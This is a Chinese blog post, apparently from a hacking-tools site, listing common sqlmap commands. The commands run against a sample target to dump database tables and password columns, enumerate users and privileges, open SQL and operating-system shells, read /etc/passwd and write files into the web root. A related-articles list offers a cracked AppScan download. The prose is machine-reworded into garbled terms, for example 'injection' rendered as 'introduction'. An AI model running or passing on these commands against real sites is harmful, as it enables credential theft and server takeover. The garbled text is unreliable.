最常见的Sqlmap用法
Sqlmap是一个技术专业的SQL引入专用工具,使用 *** 也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法:
一、Sqlmap引入篇
1、查验引入点
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆全部数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆当今数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列举特定数据库查询全部的表名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables'fujieace' 为特定数据库查询名字
4、列举特定表名的全部字段名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns'admin' 为特定表名字
5、dump输出打印表名特定列姓名段的值数据信息
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump'name,password' 为特定字段称
二、Sqlmap用户权限篇
1、列举数据库查询智能管理系统客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查询当今数据库连接客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、分辨当今客户是不是DBA?
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查询用户权限:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
三、Sqlmap文件实际操作与shell提权篇
1、sql shell
这儿根据sqlmap能够立即获得一个sql shell,立即实行sql语句开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
留意:这儿因为进入了sql shell能够实行sql语句了,还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入;
2、cmd shell
这 里根据sqlmap能够立即获得一个cmd shell,立即实行cmd指令开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、载入 *** 服务器上特定文档
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、载入本地文件到 *** 服务器上
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt相关文章
简单三步堵死SQLServer注入漏洞
SQL注入是什么? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回...
高级入侵防御系统自然环境
Advanced Intrusion Detection Environment 翻译中文也叫:高級入侵防御系统自然环境; 什么叫高級入侵防御系统自然环境? 高級入侵防御系统自然环境(...
OpenSSL是完全免费的吗?
什么叫OpenSSL? 这不是严格意义上来说是一个“黑客工具”,只是一个新项目(称之为“OpenSSL新项目”),致力于将详细的商业服务解决方法融合给网络信息安全专业人员出示安裝安全性套接字层(SS...
Kismet是完全免费的吗?
什么叫Kismet? Kismet是802.11无线网络的排序嗅探器,互联网探测器和入侵防御系统系统软件。该专用工具将与适用初始监控器方式的别的无线卡一起应用,而且还能够网络嗅探802.11a,80...
伦理道德网络黑客和IT安全系数,那么学习培训Nmap是尤为重
什么叫Nmap? Nmap是IT观念上的“互联网映射器” - “互联网”的简称。您能够 将Nmap视作最知名的一个,事实上是最有效的黑客工具之一。期。假如您认真完成规化图,伦理道德网络黑客和IT安全...
AppScan免费下载、安装、使用方法
AppScan是一个Web漏洞检测程序流程,关键适用Windows系统软件。 一、AppScan破解下载详细地址 百度搜索网盘分享:https://pan.baidu.com/s/1y...
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!